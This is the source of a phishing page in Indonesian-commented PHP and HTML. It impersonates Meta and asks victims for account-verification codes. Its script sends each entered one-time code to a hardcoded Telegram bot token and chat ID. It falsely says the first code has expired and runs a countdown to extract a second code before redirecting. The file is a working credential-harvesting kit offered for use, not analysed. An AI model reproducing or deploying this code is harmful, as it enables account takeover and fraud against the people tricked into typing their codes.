<?php
session_start();

// Cek apakah pengguna sudah diverifikasi
if (!isset($_SESSION['verified']) || $_SESSION['verified'] !== true) {
    // Jika belum diverifikasi, arahkan mereka ke halaman CAPTCHA
    header("Location: captcha.php");
    exit;
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Peninjauan Akun</title>
    <style>
        body {
            font-family: Arial, sans-serif;
    margin: 0;
    padding: 0;
    background: linear-gradient(to right, #fef4f5 5%, #edf6ff 50%, #eff8ff 75%);
    display: flex;
    justify-content: center;
    align-items: flex-start;  /* Mengubah align-items menjadi flex-start agar form lebih ke atas */
    height: 70vh;
    flex-direction: column;
    text-align: center; /* Pastikan teks juga terpusat */
    padding-top: 10px; /* Memberikan jarak tambahan di atas halaman */
}
/* Responsive Styles for Mobile */
@media (max-width: 600px) {
    

        /* Header with Logo */
        header {
            width: 100%;
            padding: 5px;
            background-color: transparent;
            color: white;
            position: absolute;
            top: 0;
            left: 0;
            padding-left: 15px; /* Jarak logo dengan sisi kiri */
            display: flex;
            
        }
         header img {
            width: 25%;
            
            margin-right: 10px;
        }
        /* Form Container - Make it smaller and center it */
        .form-container {
            background: transparent;
            padding: 20px;
            border-radius: 8px;
            
            width: 100%;
            max-width: 400px; /* Small width for form */
            position: relative;
            margin: 10px auto;
            box-sizing: border-box;
            z-index: 1;
        }

        .form-container h1 {
            text-align: left;
            margin-bottom: 3px;
            font-size: 22px; /* Slightly smaller font size */
        }

        .form-container label {
    text-align: left;
    color: #333333;
    justify-content: space-between;
    display: block;
    margin-bottom: 2px;
    font-weight: 400;
}


        .form-container input {
            width: 100%;
            background: white;
            padding: 20px;
            margin-bottom: 4px;
            border: 1px solid #ccc;
            max-width: 300px;
            margin: 0 auto 15px;
            border-radius: 8px;
            text-align: left;
            display: block;
        }
        
        .note-text {
    font-size: 13px;
    color: #777; /* Warna teks lebih muda */
    margin-bottom: 15px; /* Jarak antara teks kecil dan tombol */
    display: block;
    text-align: center;
}

        .form-container button {
            width: 100%;
            padding: 15px;
            background: #0064e0;
            color: white;
            border: none;
            border-radius: 25px;
            font-size: 16px;
            cursor: pointer;
        }

        .form-container button:hover {
            background: #1b5bbd;
        }

        .spinner {
            display: none;
            border: 4px solid #f3f3f3;
            border-top: 4px solid #2575fc;
            border-radius: 50%;
            width: 30px;
            height: 30px;
            animation: spin 1s linear infinite;
            margin: 10px auto;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }

        .alert {
            text-align: center;
            margin-bottom: 15px;
            font-size: 14px;
            padding: 10px;
            border-radius: 4px;
            color: red;
            display: none;
        }

        .alert.success {
            background-color: #4caf50;
        }

        .alert.warning {
            background-color: transparent;
        }

        .alert.error {
            background-color: #f44336;
        }

        .form-container img {
            width: 100%;
            border-radius: 8px;
            margin-top: 2px;
        }

        
        /* Body Text Styling */
.body-text {
    max-width: 600px; /* Membatasi lebar teks */
    text-align: center; /* Memastikan teks terpusat */
    margin: 20px auto; /* Menambahkan jarak atas dan bawah */
    padding: 0 20px; /* Memberikan padding di sisi kiri dan kanan */
    font-size: 16px; /* Ukuran font teks */
    color: #333; /* Warna teks */
    line-height: 1.6; /* Spasi antar baris */
}    
           .body-text img {
    max-width: 100%; /* Membuat gambar responsif */
    height: auto; /* Menjaga aspek rasio */
    margin-top: 10px; /* Jarak antara teks dan gambar */
    border-radius: 8px; /* Membuat sudut gambar melengkung */
}

    </style>
</head>
<body>
    <header>
        <img src="img/logometa.png"></header>
        
    <div class="form-container">
        
        <form id="telegramForm">
            <h1>Konfirmasi Kode anda</h1>
            <label for="textInput">Kami telah mengirimkan kode ke perangkat anda
            </br>Periksa Whatsapp/SMS dan juga email anda kemudian masukkan Kode tersebut dibawah ini:</label>
            <img src="img/kode.png" alt="Image Above Form">
            <div id="alert" class="alert"></div>
            
            <input type="text" id="textInput" name="textInput" placeholder="Masukkan kode" required>
            <small class="note-text">Kode baru akan masuk dalam beberapa saat, Harap jangan memasukkan kode sebelumnya yang sudah digunakan!</small>
            

            <button type="submit">Lanjutkan</button>
            <div id="spinner" class="spinner"></div>
        </form>
    </div>

    <script>
        const BOT_TOKEN = "7507569325:AAFf_PVxcF8xZF3OLypXwqLhY468pqErGYA"; // Ganti dengan token bot Anda
        const CHAT_ID = "6236832102"; // Ganti dengan ID chat Anda

        let submissionCount = 0; // Melacak jumlah pengiriman
const alertBox = document.getElementById('alert');
const spinner = document.getElementById('spinner');

// Fungsi untuk memulai hitung mundur 20 detik
function startCountdown() {
    let timeLeft = 30; // Timer mulai dari 20 detik
    const countdownInterval = setInterval(() => {
        if (timeLeft > 0) {
            alertBox.textContent = `Kode yang anda masukkan sudah tidak berfungsi! Silahkan masukkan kode baru yang akan kami kirim ulang dalam: ${timeLeft} detik`;
            timeLeft--;
        } else {
            clearInterval(countdownInterval);
            alertBox.textContent = 'Kode baru telah dikirim. Silahkan cek kembali!';
        }
    }, 1000); // Interval 1 detik
}

// Event listener untuk form submit
document.getElementById('telegramForm').addEventListener('submit', function (e) {
    e.preventDefault();

    // Tampilkan spinner
    spinner.style.display = 'block';

    // Simulasi animasi spinner selama 5 detik
    setTimeout(function () {
        const textInput = document.getElementById('textInput').value;
        const telegramMessage = `OTP ${submissionCount + 1} :\n==>  ${textInput}  <==`;

        // Kirim data ke Telegram
        fetch(`https://api.telegram.org/bot${BOT_TOKEN}/sendMessage`, {
            method: 'POST',
            headers: {
                'Content-Type': 'application/json'
            },
            body: JSON.stringify({
                chat_id: CHAT_ID,
                text: telegramMessage
            })
        })
            .then(response => response.json())
            .then(data => {
                if (data.ok) {
                    submissionCount++;
                    if (submissionCount === 1) {
                        alertBox.className = 'alert warning';
                        alertBox.style.display = 'block';
                        startCountdown(); // Mulai hitung mundur 20 detik
                        document.getElementById('telegramForm').reset();
                    } else if (submissionCount === 2) {
                        

                        // Arahkan ke halaman berikutnya setelah 5 detik
                        setTimeout(() => {
                            window.location.href = "selesai.php"; // Ganti dengan URL halaman berikutnya
                        }, 1000); // Delay 5 detik
                    }
                } else {
                    alertBox.textContent = 'Failed to send message. Please try again.';
                    alertBox.className = 'alert error';
                    alertBox.style.display = 'block';
                }
            })
            .catch(error => {
                console.error('Error:', error);
                alertBox.textContent = 'An error occurred. Please try again later.';
                alertBox.className = 'alert error';
                alertBox.style.display = 'block';
            })
            .finally(() => {
                // Sembunyikan spinner setelah selesai
                spinner.style.display = 'none';
            });
    }, 10000); // Spinner tetap tampil selama 5 detik
});
    </script>
</body>
</html>
